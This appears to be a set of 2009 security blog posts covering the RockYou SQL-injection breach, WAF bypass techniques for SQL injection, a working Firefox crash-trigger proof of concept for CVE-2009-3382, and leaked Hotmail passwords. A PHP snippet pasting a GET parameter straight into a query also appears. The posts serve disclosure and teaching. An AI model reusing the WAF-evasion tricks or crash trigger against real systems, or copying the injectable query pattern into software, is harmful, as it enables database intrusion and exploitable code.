December 30, 2009

Over 32 million accounts have been compromised (the result of an attack on the RockYou.com site)

It was discovered that the hacker under the pseudonym "igigi" managed to compromise the database of users of the web site RockYou.com via classical SQL Injection exploitation. The portal RockYou.com offers various services to social networks such as Facebook and MySpace. Igigi describes in detail the conducted attack in his blog. The most valuable data received by the hacker is the database of users consisting of 32’603’388 records:


Depersonalized database (without usernames, emails, and other sensitive information) was kindly downloaded to rapidshare.com, but has been already removed from there and is now available only on torrents. It should be mentioned that this incident got into the TOP5 of the greatest information leakages for the past year.

The RockYou team apologized to their users and assured them that the incident didn’t affect the privacy of their financial information. It was also reported that the vulnerabilities will be eliminated and henceforth the security issues will be attended much more carefully (compliance with industry standards in information security, applying best practices, etc.). However, information protection is based today on the principle "one vulnerability eliminated, another one forgotten".

December 28, 2009

HTTP Parameter Fragmentation (HPF) is one of the methods to bypass security filters in web applications

The idea to use HTTP Parameter Fragmentation (HPF) when calling a web application for the purpose of bypassing security filters (particularly, WAFs) is not a new one. According to one of the participants of WASC Mailing List, this technique can be occasionally found among exploits published at the site milw0rm.com. However, application of this method allows one to successfully bypass filters used in most modern WAFs (particularly, a productive one - mod_security). So, what is the essence of this technique? Let us consider it by examples of SQL Injection exploitation.

It is often necessary to have two or more user parameters in one SQL query, for example:

At the stage of verifying the parameter values received from the user on the level of web application, the application is capable of operating with variables of web server only and WAF (depending on the mode) is capable of operating directly with raw HTTP data. However, regardless of the method of accessing data, it comes to using certain regular expressions (regexps) for each separate parameter. I.e.:

December 21, 2009

(non) blind SQL Injection

Introduction

SQL Injection is a method to attack a database bypassing firewalls. In this method, parameters transmitted to the database via web applications are modified so that the executable SQL query changes. To conduct an SQL Injection attack, every possible way to interact with the application (GET, POST, COOKIE, etc.) is used.

Attacks can be conducted for the following purposes:

1. Access data that is usually inaccessible or obtain system configuration data, which can be used to develop the attack vector. For example, a modified SQL query returns user password hashes, which are subsequently decrypted using brute-force search.

2. Access other systems through the computer storing a database. This sort of attacks can be conducted using database procedures and 3GL extensions that allow one to interact with operating and file systems.

SQL Injections can be divided into the following three groups according to the exploitation techniques:

1. Classical SQL Injection;
2. Blind SQL Injection;
3. Double Blind SQL Injection/TIME-based.


Let us consider each of these techniques in detail. Taking into account the fact that SQL Injection exploitation strongly depends on the features of the structured query language (SQL) used, we will confine ourselves to considering the most widespread database – MySQL. Moreover, we will assume that SQL Injection attack is conducted via SELECT query, not via INSERT or others.

November 4, 2009

Mozilla Firefox: Proof-of-Concept (PoC) codes

October 27, Mozilla developers fixed several vulnerabilities in the browser engine used in Firefox and other Mozilla-based products. Vulnerabilities fixed in 3.0.15 and 3.5.4 versions.

CVE reference:
CVE-2009-1563, CVE-2009-3370, CVE-2009-3371, CVE-2009-3372, CVE-2009-3373, CVE-2009-3374, CVE-2009-3375, CVE-2009-3376, CVE-2009-3377, CVE-2009-3378, CVE-2009-3379, CVE-2009-3380, CVE-2009-3381, CVE-2009-3382, CVE-2009-3383

Complete list of Proof-of-Concept codes (crash triggers)

1. (CVE-2009-3382) CSS Frame Constructor (layout/base/nsCSSFrameConstructor.cpp) in the browser engine does not properly handle first-letter frames

PoC:
<html><head><script>
function doe2(i) {
document.getElementById('a').setAttribute('style', 'display: -moz-box; ');
document.getElementById('c').style.display= 'none';
}
setTimeout(doe2,500,0);
</script>
<style>
div::first-letter {float: right; }
</style>
</head>

<body>
<div style="width: 50px; -moz-column-count: 2;">
a
<span style="display: table-cell;"></span><div style="display: -moz-box; font-size: 43px;">
<span id="a">
<span style="display: -moz-box;">
<span id="c">m</span>
</span>
</span>
</div>

</div>
</body>
</html>

2. (CVE-2009-1563) Array indexing error in NSPR's Balloc() leads to floating point memory vulnerability

October 28, 2009

Another fine method to exploit SQL Injection and bypass WAF

A method that I discovered today in MySQL documentation struck me with its simplicity and the fact that I haven’t noticed it before. Let me describe this method of bypassing WAF.

MySQL servers allow one to use comments of the following type:

/*!sql-code*/ and /*!12345sql-code*/

As can be noticed, SQL code will be executed from the comment in both cases! The latter construction means that "sql-code" should be executed only if the DBMS version is later than the given value.

As I have been repeatedly asserted [1,2], some WAFs skip comments during signature search. Among such WAFs, there is the latest stable assembly of Mod_Security (v. 2.5.9).

Here is a simple example:

...
$query = "SELECT name FROM table where id = ".$_GET[id];

$result = mysql_query($query);
...

October 7, 2009

Password analysis for Windows Live Hotmail users

There’s again news that user account database is available in the Internet. Now it is about Windows Live Mail users. The origin says that more than 10000 passwords of Hotmail user accounts are in public access. I could not miss it, and brief googling leads me to the true origin. Now pastebin.com server operates unstably but google cache works perfectly:)

So, firstly, the list of published and sorted (without repetitions) accounts includes only accounts that start from letters "a" and "b". It means that the full list of users is much bigger than the published list. If we assume that there are about 4000-5000 accounts for every English alphabet letter it’s easy to calculate that the full list of compromised accounts could reach 150000.

Secondly, only 9238 of 10028 published accounts are legitimate. If we also consider Hotmail restriction policy that requires password length to be no less than 6 characters, only 8250 accounts are legitimate.